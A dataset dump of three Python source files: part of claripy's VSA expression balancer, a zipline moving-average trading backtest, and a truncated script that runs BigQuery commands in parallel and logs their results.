args:\n :return:\n '''\n\n high, low, to_extract = args\n cond_operation, cond_operand = condition\n # Make sure the condition operand has the same size as to_extract\n new_condition = cond_operation, _all_operations.ZeroExt((high - low + 1), cond_operand)\n ast, cond = self._simplify(to_extract.op, to_extract.args, to_extract, new_condition)\n\n # Create the new ifproxy\n if ast is None:\n # We cannot handle it\n return None, condition\n\n elif ast.op == 'If':\n new_ifproxy = _all_operations.If(\n ast.args[0],\n _all_operations.Extract(high, low, ast.args[1]),\n _all_operations.Extract(high, low, ast.args[2])\n )\n\n else:\n cond_op, cond_arg = cond\n if type(self._backend.convert(cond_arg)) in (int, long): #pylint:disable=unidiomatic-typecheck\n cond_arg = _all_operations.BVV(cond_arg, ast.size())\n elif type(self._backend.convert(cond_arg)) in (vsa.StridedInterval, vsa.DiscreteStridedIntervalSet, bv.BVV): #pylint:disable=unidiomatic-typecheck\n if ast.size() > cond_arg.size():\n # Make sure two operands have the same size\n cond_arg = _all_operations.ZeroExt(ast.size() - cond_arg.size(), cond_arg)\n\n if cond_arg.size() - 1 < high + 1 or \\\n is_true(cond_arg[cond_arg.size() - 1 : high + 1] == 0):\n # The upper part doesn't matter\n # We can handle it\n return self._simplify(ast.op, ast.args, ast, (cond_op, cond_arg))\n else:\n # We cannot further simplify it\n return expr, condition\n\n return new_ifproxy, condition\n\n def _simplify_Concat(self, args, expr, condition):\n '''\n Convert Concat(a, If(...)) to If(..., Concat(a, ...), Concat(a, ...))\n\n :param args:\n :return:\n '''\n\n new_args = [ self._simplify(ex.op, ex.args, ex, condition) for ex in args ]\n\n ifproxy_conds = set([ a.args[0] for a, new_cond in new_args if a.op == 'If' ])\n\n if len(ifproxy_conds) == 0:\n # Let's check if we can remove this layer of Concat\n cond = condition[1]\n if len(args) == 2:\n if cond.size() - 1 >= cond.size() - args[0].size():\n if is_true(args[0] == cond[ cond.size() - 1 : cond.size() - args[0].size() ]):\n # Yes! We can remove it!\n # TODO: This is hackish...\n new_cond = (condition[0], cond[ cond.size() - args[0].size() - 1 : 0])\n return self._simplify(args[1].op, args[1].args, args[1], new_cond)\n\n else:\n # args[0].size() == 0? It must be a bug.\n raise ClaripyBackendVSAError(\n 'args[0].size() == %d (args[0] is \\'%s\\'). Please report this bug.' % (args[0].size, str(args[0])))\n\n # Cannot simplify it anymore\n return expr, condition\n\n elif len(ifproxy_conds) > 1:\n # We have more than one condition. Cannot handle it for now!\n return None, condition\n\n else:\n concat_trueexpr = [ ]\n concat_falseexpr = [ ]\n\n all_new_conds = set([ new_cond for a, new_cond in new_args ])\n\n if len(all_new_conds) > 1:\n # New conditions are not consistent. Can't handle it.\n return expr, condition\n\n for a, new_cond in new_args:\n if a.op == \"If\":\n concat_trueexpr.append(a.args[1])\n concat_falseexpr.append(a.args[2])\n else:\n concat_trueexpr.append(a)\n concat_falseexpr.append(a)\n\n new_ifproxy = _all_operations.If(\n list(ifproxy_conds)[0],\n _all_operations.Concat(*concat_trueexpr),\n _all_operations.Concat(*concat_falseexpr)\n )\n\n return new_ifproxy, condition\n\n def _simplify_I(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n return expr, condition\n\n def _simplify_If(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n return expr, condition\n\n def _simplify_Reverse(self, args, expr, condition): #pylint:disable=unused-argument\n # TODO: How should we deal with Reverse in a smart way?\n\n arg = args[0]\n\n return self._simplify(arg.op, arg.args, arg, condition)\n\n def _simplify_widen(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify_intersection(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___or__(self, args, expr, condition):\n claripy = expr._claripy\n argl, argr = args\n if argl is argr or claripy.is_true(argl == argr):\n return self._simplify(argl.op, argl.args, argl, condition)\n elif claripy.is_true(argl == 0):\n return self._simplify(argr.op, argr.args, argr, condition)\n elif claripy.is_true(argr == 0):\n return self._simplify(argl.op, argl.args, argl, condition)\n else:\n return expr, condition\n\n def _simplify___and__(self, args, expr, condition):\n\n argl, argr = args\n if argl is argr:\n # Operands are the same one!\n # We can safely remove this layer of __and__\n return self._simplify(argl.op, argl.args, argl, condition)\n\n elif argl.structurally_match(argr):\n # Operands are the same\n # Safely remove the __and__ operation\n return self._simplify(argl.op, argl.args, argl, condition)\n\n else:\n # We cannot handle it\n return expr, condition\n\n def _simplify___xor__(self, args, expr, condition):\n argl, argr = args\n\n if is_true(argl == 0):\n # :-)\n return self._simplify(argr.op, argr.args, argr, condition)\n elif is_true(argr == 0):\n # :-)\n return self._simplify(argl.op, argl.args, argl, condition)\n else:\n # :-(\n return expr, condition\n\n def _simplify___add__(self, args, expr, condition):\n\n argl, argr = args\n if is_true(argr == 0):\n # This layer of __add__ can be removed\n return self._simplify(argl.op, argl.args, argl, condition)\n elif is_true(argl == 0):\n # This layer of __add__ can be removed\n return self._simplify(argr.op, argr.args, argr, condition)\n else:\n\n if isinstance(self._backend.convert(argl), bv.BVV):\n new_cond = (condition[0], condition[1] - argl)\n return self._simplify(argr.op, argr.args, argr, new_cond)\n\n elif isinstance(self._backend.convert(argr), bv.BVV):\n new_cond = (condition[0], condition[1] - argr)\n return self._simplify(argl.op, argl.args, argl, new_cond)\n\n else:\n return expr, condition\n\n def _simplify___radd__(self, args, expr, condition):\n return self._simplify___add__((args[1], args[0]), expr, condition)\n\n def _simplify___sub__(self, args, expr, condition):\n \"\"\"\n\n :param args:\n :param expr:\n :param condition:\n :return:\n \"\"\"\n\n argl, argr = args\n if is_true(argr == 0):\n return self._simplify(argl.op, argl.args, argl, condition)\n elif is_true(argl == 0):\n return self._simplify(argr.op, argr.args, argr, condition)\n else:\n return expr, condition\n\n def _simplify___rsub__(self, args, expr, condition):\n return self._simplify___sub__((args[1], args[0]), expr, condition)\n\n def _simplify___rshift__(self, args, expr, condition):\n\n arg, offset = args\n if is_true(offset == 0):\n return self._simplify(arg.op, arg.args, arg, condition)\n else:\n return expr, condition\n\n def _simplify___lshift__(self, args, expr, condition):\n\n arg, offset = args\n if is_true(offset == 0):\n return self._simplify(arg.op, arg.args, arg, condition)\n else:\n return expr, condition\n\n def _simplify___invert__(self, args, expr, condition):\n\n arg = args[0]\n if arg.op == 'If':\n new_arg = _all_operations.If(args[0], args[1].__invert__(), args[2].__invert__())\n\n return self._simplify(new_arg.op, new_arg.args, expr, condition)\n\n else:\n return expr, condition\n\n def _simplify_union(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___mod__(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___div__(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n return expr, condition\n\n def _simplify___eq__(self, args, expr, condition): #pylint:disable=unused-argument,no-self-use\n\n l.error('_simplify___eq__() should not exist. This is just a workaround for VSA. Fish will fix the issue later.')\n\n return expr, condition\n\n def _handle_comparison(self, args, comp=None):\n \"\"\"\n Handles all comparisons.\n :param args:\n :param comp:\n :return:\n \"\"\"\n\n if comp in self.comparison_info:\n is_lt, is_equal, is_unsigned = self.comparison_info[comp]\n else:\n raise ClaripyBalancerError('Support for comparison %s is not implemented. Please report it.' % comp)\n\n lhs, rhs = args\n\n if not isinstance(lhs, Base):\n raise ClaripyBalancerError('Left-hand-side expression is not an AST object.')\n\n lhs_bo = self._backend.convert(lhs)\n rhs_bo = self._backend.convert(rhs)\n\n # Maybe the target variable is the rhs\n if lhs.cardinality == 1 or lhs_bo.is_empty:\n new_op = self.reversed_operations[comp]\n new_lhs, new_rhs = rhs, lhs\n return self._handle(new_op, (new_lhs, new_rhs))\n\n if lhs.op == 'If':\n condition, trueexpr, falseexpr = lhs.args\n trueexpr = self._backend.convert(trueexpr)\n falseexpr = self._backend.convert(falseexpr)\n\n if is_unsigned:\n if is_lt:\n if is_equal:\n take_true = is_true(trueexpr.ULE(rhs_bo))\n take_false = is_true(falseexpr.ULE(rhs_bo))\n else:\n take_true = is_true(falseexpr.ULT(rhs_bo))\n take_false = is_true(trueexpr.ULT(rhs_bo))\n else:\n if is_equal:\n take_true = is_true(trueexpr.UGE(rhs_bo))\n take_false = is_true(falseexpr.UGE(rhs_bo))\n else:\n take_true = is_true(trueexpr.UGT(rhs_bo))\n take_false = is_true(falseexpr.UGT(rhs_bo))\n else:\n if is_lt:\n if is_equal:\n take_true = is_true(trueexpr <= rhs_bo)\n take_false = is_true(falseexpr <= rhs_bo)\n else:\n take_true = is_true(trueexpr < rhs_bo)\n take_false = is_true(falseexpr < rhs_bo)\n else:\n if is_equal:\n take_true = is_true(trueexpr >= rhs_bo)\n take_false = is_true(falseexpr >= rhs_bo)\n else:\n take_true = is_true(trueexpr > rhs_bo)\n take_false = is_true(falseexpr > rhs_bo)\n\n if take_true and take_false:\n # It's always satisfiable\n return True, [ ]\n elif take_true:\n return self._handle(condition.op, condition.args)\n elif take_false:\n rev_op = self.reversed_operations[condition.op]\n return self._handle(rev_op, condition.args)\n else:\n # Not satisfiable\n return False, [ ]\n\n elif isinstance(rhs_bo, vsa.StridedInterval) and isinstance(lhs_bo, vsa.StridedInterval):\n if isinstance(lhs_bo, Base):\n # It cannot be computed by our backend...\n # We just give up for now\n return True, [ ]\n\n stride = lhs_bo.stride\n\n if is_lt:\n # < or <=\n if is_unsigned: lb = 0\n else: lb = vsa.StridedInterval.min_int(rhs.length)\n\n ub = rhs_bo.upper_bound\n if not is_equal:\n # <\n ub = ub - 1\n\n else:\n # > or >=\n if is_unsigned: ub = vsa.StridedInterval.max_int(rhs.length)\n else: ub = vsa.StridedInterval.max_int(rhs.length - 1)\n\n lb = rhs_bo.lower_bound\n if not is_equal:\n # >\n lb = lb + 1\n\n if stride == 0 and lb != ub:\n # Make sure the final vsa.StridedInterval is always meaningful. See issue #55.\n stride = 1\n\n si_replacement = _all_operations.SI(bits=rhs.length, stride=stride, lower_bound=lb, upper_bound=ub)\n return True, [(lhs, si_replacement)]\n\n else:\n return True, [ ]\n\n def _handle___lt__(self, args): return self._handle_comparison(args, comp='__lt__')\n def _handle___le__(self, args): return self._handle_comparison(args, comp='__le__')\n def _handle___gt__(self, args): return self._handle_comparison(args, comp='__gt__')\n def _handle___ge__(self, args): return self._handle_comparison(args, comp='__ge__')\n def _handle_ULT(self, args): return self._handle_comparison(args, comp='ULT')\n def _handle_ULE(self, args): return self._handle_comparison(args, comp='ULE')\n def _handle_UGT(self, args): return self._handle_comparison(args, comp='UGT')\n def _handle_UGE(self, args): return self._handle_comparison(args, comp='UGE')\n def _handle_SLT(self, args): return self._handle_comparison(args, comp='SLT')\n def _handle_SLE(self, args): return self._handle_comparison(args, comp='SLE')\n def _handle_SGT(self, args): return self._handle_comparison(args, comp='SGT')\n def _handle_SGE(self, args): return self._handle_comparison(args, comp='SGE')\n\n def _handle_I(self, args): #pylint:disable=no-self-use\n a = args[0]\n\n if a in (False, 0):\n return False, [ ]\n elif isinstance(a, bv.BVV) and a.value == 0:\n return False, [ ]\n\n return True, [ ]\n\n def _handle_Not(self, args):\n \"\"\"\n The argument should be False\n\n :param args:\n :return:\n \"\"\"\n\n a = args[0]\n expr_op = a.op\n expr_args = a.args\n\n # Reverse the op\n expr_op = self.reversed_operations[expr_op]\n\n return self._handle(expr_op, expr_args)\n\n def _handle_And(self, args):\n \"\"\"\n\n :param args:\n :return:\n \"\"\"\n\n sat = True\n lst = [ ]\n\n # Both sides must be true\n for arg in args:\n sat_, lst_ = self._handle(arg.op, arg.args)\n\n sat &= sat_\n lst.extend(lst_)\n\n if not sat:\n lst = [ ]\n\n return sat, lst\n\n def _handle_Or(self, args):\n\n if len(args) == 1:\n return self._handle(args[0].op, args[0].args)\n\n else:\n if len(args) > 0:\n args = [ self._handle(a.op, a.args) for a in args ]\n if any([not is_false(a) for a in args]):\n return True, [ ]\n\n else:\n return False, [ ]\n return True, [ ]\n\n def _handle___ne__(self, args):\n return self._handle_eq_ne(args, False)\n\n def _handle___eq__(self, args):\n return self._handle_eq_ne(args, True)\n\n def _handle_eq_ne(self, args, is_eq):\n \"\"\"\n\n :param args:\n :return: True or False, and a list of (original_si, constrained_si) tuples\n \"\"\"\n\n lhs, rhs = args\n\n if not isinstance(lhs, Base):\n raise ClaripyBalancerError('Left-hand-side expression is not an AST object.')\n\n size = lhs.size()\n\n if type(rhs) in (int, long): #pylint:disable=unidiomatic-typecheck\n # Convert it into a BVV\n rhs = _all_operations.BVV(rhs, size)\n\n if not isinstance(rhs, Base):\n raise ClaripyBalancerError('Right-hand-side expression cannot be converted to an AST object.')\n\n # TODO: Make sure the rhs doesn't contain any IfProxy\n\n if lhs.op == 'If':\n condition, trueexpr, falseexpr = lhs.args\n\n if is_eq:\n # __eq__\n take_true = is_true(rhs == trueexpr)\n take_false = is_true(rhs == falseexpr)\n else:\n # __ne__\n take_true = is_true(rhs == falseexpr)\n take_false = is_true(rhs == trueexpr)\n\n if take_true and take_false:\n # It's always satisfiable\n return True, [ ]\n\n elif take_true:\n # We take the true side\n return self._handle(condition.op, condition.args)\n\n elif take_false:\n # We take the false side\n\n # Reverse the operation first\n rev_op = self.reversed_operations[condition.op]\n\n return self._handle(rev_op, condition.args)\n\n else:\n # Not satisfiable\n return False, [ ]\n elif isinstance(self._backend.convert(lhs), vsa.StridedInterval) or isinstance(self._backend.convert(lhs), bv.BVV):\n if not isinstance(self._backend.convert(lhs), vsa.StridedInterval):\n try: lhs = _all_operations.SI(to_conv=lhs)\n except BackendError: return True, [ ] # We cannot convert it to a vsa.StridedInterval\n\n try: rhs = self._backend.convert(rhs)\n except BackendError: return True, [ ]\n\n if is_eq:\n return True, [ (lhs, rhs)]\n else:\n lhs_bo = self._backend.convert(lhs)\n rhs_bo = self._backend.convert(rhs)\n\n if lhs_bo.upper_bound <= rhs_bo.upper_bound:\n r = self._backend.CreateStridedInterval(bits=rhs_bo.bits,\n stride=lhs_bo.stride,\n lower_bound=lhs_bo.lower_bound,\n upper_bound=rhs_bo.lower_bound - 1)\n\n return True, [ (lhs, r) ]\n elif lhs_bo.lower_bound >= rhs_bo.lower_bound:\n r = self._backend.CreateStridedInterval(bits=rhs_bo.bits,\n stride=lhs_bo.stride,\n lower_bound=rhs_bo.lower_bound + 1,\n upper_bound=lhs_bo.upper_bound)\n\n return True, [ (lhs, r) ]\n else:\n # We cannot handle it precisely\n return True, [ ]\n else:\n # TODO: handle this\n return True, [ ]\n\ndef is_true(a): return backends.vsa.is_true(a)\ndef is_false(a): return backends.vsa.is_false(a)\n\nfrom .errors import ClaripyBalancerError, ClaripyBackendVSAError, BackendError\nfrom .ast.base import Base\nfrom . import _all_operations\nfrom .backend_manager import backends\nfrom . import vsa\nfrom . import bv\n","sub_path":"claripy/balancer.py","file_name":"balancer.py","file_ext":"py","file_size_in_byte":26704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"505924937","text":"import sys\nsys.path.append('C:/Users/William/Documents/GitHub/faber-trading-strategy/algos')\nfrom numpy import mean\nfrom collections import defaultdict\nfrom zipline.api import order_target, record, symbol, date_rules, time_rules, schedule_function\nfrom write_to_sql import run\nimport pandas as pd\nimport os\n\nfrom zipline.finance import commission\n\ndef initialize(context):\n \"\"\"\n Stores the names of the stocks we'll be looking at.\n \n Input: a persistent namespace where we store an SID/list of SIDs\n \n Output: n/a\n \"\"\"\n context.benchmark = symbol('SPY')\n\n # context.symbol = [symbol('AAPL')]\n\n context.symbol = [symbol('XLB'),\n symbol('XLE'),\n symbol('XLF'), \n symbol('XLK'), \n symbol('XLP'), \n symbol('XLY')]\n\n # keep track of number of shares bought\n # context.shares = defaultdict(int)\n context.long_sma = defaultdict(int)\n context.short_sma = defaultdict(int)\n\n context.set_commission(commission.PerShare(cost=0))\n\n # initializes certain params in handle_data that must be run only on the first event\n context.skip = 0\n\n context.ratio = 0\n schedule_function(skip_days, date_rules.every_day(), time_rules.market_open(minutes=1))\n schedule_function(trade, date_rules.every_day(), time_rules.market_open(minutes=3))\n\ndef skip_days(context, data):\n context.skip += 1\n\ndef trade(context, data):\n \"\"\"\n Herein lies Faber's trading strategy.\n \n Input: persistent namespace with SID(s) 'context', event-frame that handles look-ups of historical/current pricing data\n \n Output: some kind of action (buy/sell/nothing) on the last trading day of each month\n \"\"\"\n if context.skip < 200:\n pass\n\n else:\n for asset in context.symbol:\n # calculate 200-day and 20-day sma\n context.long_sma[asset] = mean(data.history(asset, 'close', 200,'1d'))\n context.short_sma[asset] = mean(data.history(asset, 'close', 50, '1d'))\n \n ### Trading strategy ###\n\n for asset in context.symbol:\n # if the short_sma > long_sma, buy\n if context.short_sma[asset] >= context.long_sma[asset]:\n order_target(asset, 100)\n # context.shares[asset] = 100\n\n # else if the current price is below moving average, short\n elif context.short_sma[asset] < context.long_sma[asset]:\n order_target(asset, 0)\n # context.shares[asset] = 0\n\n # save/record the data for future plotting\n # record(asset = context.monthly_price[asset][-1], sma = context.moving_avg[asset])\n\n # record portfolio value\n # record(portfolio = context.portfolio.portfolio_value)\n\n # # also record the S&P 500 monthly price\n # record(SPY = context.ratio * data.current(context.benchmark, 'close'))\n \n\ndef handle_data(context, data):\n pass\n\ndef analyze(context = None, results = None):\n \"\"\"\n Plots the results of the strategy against a buy-and-hold strategy.\n \n Input: n/a?\n \n Output: a plot of two superimposed curves, one being Faber's strategy and the other being a buy-and-hold strategy.\n \"\"\"\n # import matplotlib.pyplot as plt\n\n # txn = results['transactions']\n # txn.to_csv('transactions.csv')\n\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n\n # # plot both the portfolio based on faber's strategy and a buy-and-hold strategy\n # results['portfolio'].plot(ax=ax1)\n # # results['SPY'].plot(ax=ax1)\n # ax1.set_ylabel('Portfolio value (USD)')\n \n # # export portfolio values to csv file\n # results['returns'].to_csv('zipline_returns.csv')\n\n # plt.show()\n\n\n import pyfolio as pf\n\n returns, positions, transactions = pf.utils.extract_rets_pos_txn_from_zipline(results)\n pf.create_simple_tear_sheet(returns, positions=positions, transactions=transactions) \n transactions.to_csv('transactions.csv')\n # tickers = []\n # for symbol in context.symbol:\n # symbol = str(symbol).translate(None, '0123456789[]() ')[6:]\n # tickers.append(symbol)\n\n # run('test.db', results, 'faber', tickers)\n","sub_path":"trading algos/dual_moving_avg.py","file_name":"dual_moving_avg.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"297037662","text":"#!/usr/bin/env python\n\n# Copyright 2015, Google, Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nDate: 2016-11-09\nAuthor: Nabeel Saad\nDesc: Command-line application, which asynchronously executes jobs via bash/CLI (for BQ and others like Hive).\nUse: Commands to run are expected in a separate file, each command on a new line, semi-colon delimited with format:\n category; number of times to run; command\nParams: GCP / BigQuery project ID, file containing commands to run\n\"\"\"\n\nimport argparse\nimport csv\nimport datetime\nimport json\nimport os\nimport time\nimport uuid\nimport subprocess\nimport sys\n#TODO remove, when getting rid of test, get rid of this import\nimport random\nimport logging\n\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\nfrom subprocess import Popen, PIPE, CalledProcessError\nfrom datetime import datetime\nfrom time import sleep\n\n# [START load_commands]\ndef load_commands(filename):\n f = open(filename, 'r')\n \n com_id = 1\n for line in f:\n #Ignore the line that gives an example of the format to be used in the file\n if (line[:1] == \"#\"):\n continue \n \n commandComponents = (line[:-1] if line.endswith('\\n') else line).split(';')\n if (len(commandComponents) != 3):\n output_log(\"ERROR: The format of the file doesn't match the expected format, please follow the categoy;number;command format\", \"true\", 40)\n sys.exit()\n \n num_of_executions = int(commandComponents[1]) * int(multiplier)\n \n #Add in duplicate commands up to the number of executions passed in the file \n for i in range(0, num_of_executions):\n \n #if we are running BQ command \n if commandComponents[2].find(\"bq\") != -1:\n command = commandComponents[2]\n bq_location = commandComponents[2].find(\"bq\")\n bq_end = bq_location + len(\"bq\") + 1 #include space in this\n command = command[:bq_end] + '--project_id ' + project_id + \" \" + command[bq_end:]\n \n if commandComponents[0].find(\"test\") != -1:\n command = commandComponents[2] + \" \" + str(random.randrange(0, 10, 1)) + \";echo 'done'\"\n \n c = Command(commandComponents[0].strip(), command)\n \n #Store the commands in the list to run\n commands.append(c);\n com_id += 1\n \n# [END load_commands]\n\n# [START run_jobs]\ndef run_jobs():\n\n #Iterate through all the commands\n for command in commands:\n \n #Split the command appropriately for Popen\n cmd = command.executable\n command_args, statement = extract_quoted_sql(cmd)\n \n output_log(\" | \", \"true\", 20)\n output_log(\" |--> \" + cmd, \"true\", 20)\n \n #Run each command in a process\n p = subprocess.Popen(command_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n #Store the processes to check their output later\n processes.append(p)\n \n output_log(\"\\n\", \"true\", 20)\n# [END run_jobs]\n \n# [START extract_quoted_sql]\ndef extract_quoted_sql(cmd):\n \n #If we have a quote separating out a SQL statement in BQ\n #TODO BQ specific, or what does a hive call look like? deal with other tech checks here\n #TODO online, check kenneth email with US folks about hive CLI\n if cmd.find('\"') != -1:\n #First the double quote to extract the SQL statement\n first_quote = cmd.find('\"') + 1\n statement = cmd[first_quote:-1]\n \n #Break up the command options into list\n command_args = cmd[:first_quote - 1].split()\n command_args.append(statement)\n else:\n command_args = cmd.split()\n \n return command_args, statement\n# [END extract_quoted_sql]\n \n# [START wait_for_processes_and_start_pollers()]\ndef wait_for_processes_and_start_pollers():\n \n #FR: add in ability to only have X number of pollers spun up so that they don't exhaust a machine if too many jobs are running, have a pool and spin up more as needed\n # or maybe this FR is about using multiprocessing to call the inside code via separate thread -- making sure those threads have access to: project_id, jobs_run\n # it would have to use a thread pool otherwise I'd have tons of threads spinning up like crazy \n #Check the status of the bash shell processes, and get their output\n while len(processes) > 0:\n for p in processes:\n #When the process has completed and returned a success exit code\n if p.poll() == 0:\n out, err = p.communicate()\n \n command_end_time = int(round(time.time() * 1000)) \n str_command_end_time = str(datetime.now())\n #TODO BQ specific project, ID...\n job_id_newline = out.find(\"\\n\")\n out = out[:job_id_newline] #Remove the \\ns before printing \n job_id_location = out.find(project_id) + len(project_id) + 1\n job_id = out[job_id_location:]\n \n #TODO BQ specific, pass in the correct tech in here\n polling_processes.append(subprocess.Popen([\"python\", \"poller.py\", str(job_id), \"bq\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE))\n \n #Create a JobResult and start filling in the info\n jb = JobResult(job_id)\n jb.bash_start_time = commands_start_time\n jb.bash_end_time = command_end_time\n jb.bash_duration = int(command_end_time) - int(commands_start_time)\n jobs_run.append(jb)\n \n output_log(str_command_end_time + \" \" + str(out), \"true\", 20)\n processes.remove(p)\n \n output_log(\" \", \"true\", 20)\n output_log(\"Awaiting \" + str(len(polling_processes)) + \" BigQuery jobs to complete\", \"true\", 20)\n# [END wait_for_processes_and_start_pollers()]\n\n# [START wait_for_pollers()]\ndef wait_for_pollers():\n \n while len(polling_processes) > 0:\n for p in polling_processes:\n if p.poll() == 0:\n out, err = p.communicate()\n \n #If the process returns an output\n if out != None: \n polling_processes.remove(p)\n output_log(\" |--> waiting for \" + str(len(polling_processes)) + \" poller(s)\", \"true\", 20)\n \n #TODO BQ specific, response would be different\n #Process the JSON and look for the relevant information.\n parsedjson = json.loads(out)\n status = parsedjson['status']\n state = status['state']\n \n if(state == \"DONE\"):\n job_reference = parsedjson['jobReference']\n job_id = job_reference['jobId']\n \n #Create a new jobresult with the ID\n jb = JobResult(job_id);\n \n #But check for it in the jobs_running\n for job in jobs_run:\n if job.job_id == job_id:\n jb = job\n \n jb.status = state\n statistics = parsedjson['statistics']\n jb.bq_start_time = statistics['startTime']\n jb.bq_end_time = statistics['endTime']\n jb.bq_duration = int(jb.bq_end_time) - int(jb.bq_start_time)\n jb.bytes_processed = statistics['totalBytesProcessed']\n \n configuration = parsedjson['configuration']\n query = configuration['query']\n sql_statement = query['query']\n jb.query_executed = sql_statement\n \n jb.category = get_query_category(jb.query_executed)\n \n jobs_completed.append(jb)\n if jb in jobs_run: jobs_run.remove(jb)\n# [END wait_for_pollers()]\n\n# [START get_query_category(query)]\ndef get_query_category(query):\n for c in commands:\n ca, cq = extract_quoted_sql(c.executable)\n if cq == query:\n return c.category\n \n output_log(\"Somehow non of the loaded commands match the executed query here\", None, 30)\n# [END get_query_category(query)] \n \n# [START output_completed_jobs]\ndef output_completed_jobs():\n \n result_path = path + \"results/\" \n \n output_filename = output_file + \"-results.csv\"\n output_filename = os.path.join(result_path, output_filename)\n \n if not os.path.exists(result_path):\n os.makedirs(result_path)\n \n file_exists = False\n try:\n #If it doesn't throw an error to read, then the file exists; otherwise, create a new file\n f = open(output_filename, 'r')\n #If soo, load it to append\n f = open(output_filename, 'a')\n #And then we know the file already existed\n file_exists = True \n except IOError as detail:\n if str(detail).find(\"No such file or directory\"):\n try:\n f = open(output_filename, 'wt')\n except IOError:\n output_log(\"Can not open file to write, check the script's permissions in this directory\", \"true\", 40)\n f.close()\n \n try:\n writer = csv.writer(f)\n \n if(not file_exists):\n writer.writerow( ('Status', 'BQ Job Duration', 'Bash Job Duration', 'Bytes Processed', 'BQ Job Start Time', 'BQ Job End Time' , \\\n 'Bash Job Start Time', 'Bash Job End Time', 'Category', 'Query', 'Job Id') )\n \n for job in jobs_completed:\n writer.writerow( (job.status, job.bq_duration, job.bash_duration, human_readable_bytes(int(job.bytes_processed)), \\\n date_time_from_milliseconds(job.bq_start_time), date_time_from_milliseconds(job.bq_end_time), \\\n date_time_from_milliseconds(job.bash_start_time), date_time_from_milliseconds(job.bash_end_time), \\\n job.category, job.query_executed, job.job_id) )\n\n finally:\n f.close()\n \n for i in range(0, len(jobs_completed)):\n output_log(jobs_completed[i].print_jobresult_details(), \"true\", 20) \n# [END output_completed_jobs]\n\n# [START output_log()]\ndef output_log(message, _print, level): \n if( _print == \"true\" and no_console_output != True):\n print(message)\n \n logging.log(level, message)\n \n# [END output_log()]\n\n#Class\nclass Command:\n \"\"\"The command object to be used for loading the queries to be run\"\"\"\n category = \"\"\n executable = \"\"\n \n def __init__(self, category, command):\n self.category = category\n self.executable = command\n \n def print_command_details(self):\n print('Command with category[' + self.category + '] timesToExecute[' + str(self.timesToExecute) + '] \\n--> executable[' + self.executable + '] ')\n#End Class\n\n#Class\nclass JobResult:\n \"\"\"The result details for each job run\"\"\"\n job_id = 0\n status = \"\"\n bq_start_time = \"\"\n bq_end_time = \"\"\n bq_duration = \"\"\n bash_start_time = \"\"\n bash_end_time = \"\"\n bash_duration = \"\"\n bytes_processed = \"\"\n category = \"\"\n query_executed = \"\"\n \n def __init__(self, job_id):\n self.job_id = job_id\n \n def print_jobresult_job_id(self):\n print('JobResult with job_id[' + self.job_id + ']')\n \n def print_jobresult_details(self):\n return 'JobResult with job_id[' + self.job_id + ']' + \"\\n\" + \\\n ' |--> status[' + self.status + ']' + \"\\n\" + \\\n ' |--> bq_duration[' + str(self.bq_duration) + '] bq_start_time[' + date_time_from_milliseconds(self.bq_start_time) + '] bq_end_time[' + date_time_from_milliseconds(self.bq_end_time) + ']' + \"\\n\" + \\\n ' |--> bash_duration[' + str(self.bash_duration) + '] bash_start_time[' + date_time_from_milliseconds(self.bash_start_time) + '] bash_end_time[' + date_time_from_milliseconds(self.bash_end_time) + ']' + \"\\n\" + \\\n ' |--> bytes_processed[' + human_readable_bytes(int(self.bytes_processed)) + '] category[' + str(self.category) + ']' + \"\\n\" + \\\n ' |--> query[' + str(self.query_executed) + ']'\n#End Class\n\ndef date_time_from_milliseconds(ms):\n s, ms = divmod(int(ms), 1000)\n return '%s.%03d' % (time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(s)), ms)\n\ndef human_readable_bytes(num, suffix='B'):\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n return \"%.1f%s%s\" % (num, 'Yi', suffix) \n\n#Script defaults that can be set\ncommands_start_time = \"\"\ncommands = [] #Used to store the commands loaded from the file\njobs_run = [] #Used to store the job results of running jobs\njobs_completed = [] #Used to store the job results of jobs that have been confirmed completed.\nprocesses = [] #Used to store the processes launched in parallel to run all the commands\npolling_processes = [] #Used to store the processes running the pollers for each job\npath=\"runs/\"\n \n# [START run]\ndef main(commandsFile):\n load_commands(commandsFile)\n output_log(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++\", \"true\", 20)\n output_log(\"Run with configuration: \", \"true\", 20)\n output_log(\" |--> command_file: \" + commandsFile, \"true\", 20)\n output_log(\" |--> project_id: \" + project_id, \"true\", 20)\n output_log(\" |--> multiplier: \" + multiplier, \"true\", 20)\n output_log(\" |--> run id: \" + run_id, \"true\", 20)\n output_log(\"--------------------------------------------------------\\n\\n\", \"true\", 20)\n output_log(str(datetime.now()) + \" -- Starting parallel bash scripts: \", \"true\", 20)\n \n #Get the start time of all commands\n global commands_start_time\n commands_start_time = int(round(time.time() * 1000))\n \n run_jobs()\n wait_for_processes_and_start_pollers()\n wait_for_pollers()\n \n output_log(\"\\n--------------------------------------------------------\", \"true\", 20)\n output_log(str(datetime.now()) + \" -- Job Results\", \"true\", 20)\n output_log(\"--------------------------------------------------------\\n\", \"true\", 20)\n output_completed_jobs();\n 